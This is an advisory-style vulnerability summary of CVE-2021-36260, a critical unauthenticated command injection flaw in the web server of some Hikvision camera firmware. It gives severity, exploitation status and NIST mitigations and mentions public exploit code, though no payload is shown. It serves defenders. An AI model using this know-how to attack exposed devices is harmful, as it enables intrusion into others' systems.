CVE-2021-36260
Published: 22 September 2021
Summary
CVE-2021-36260 is a critical-severity OS Command Injection (CWE-78) vulnerability in Hikvision Ds-2Cd2121G1-Idw Firmware. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 0.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
A command injection vulnerability tracked as CVE-2021-36260 affects the web server component in certain Hikvision products. The flaw stems from insufficient input validation (CWE-78) that allows specially crafted messages containing malicious commands to be processed, resulting in a CVSS 3.1 base score of 9.8.
An unauthenticated attacker with network access can send crafted HTTP requests to the web server and execute arbitrary operating-system commands. Successful exploitation grants full confidentiality, integrity, and availability impact, enabling remote code execution without user interaction or credentials.
The official Hikvision security advisory lists affected firmware versions and provides remediation guidance, while public exploit code on Packet Storm and reports of widespread in-the-wild exploitation confirm active targeting of exposed devices.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-22880
Vulnerability details
A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
- CWE(s)
- KEV Date Added
- 10 January 2022
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation of all input to the web server, blocking the malicious command strings that trigger the CWE-78 injection.
Mandates timely application of Hikvision firmware patches that eliminate the vulnerable web-server code paths.
Enforces least functionality on the device, disabling or restricting the web server’s ability to invoke OS commands.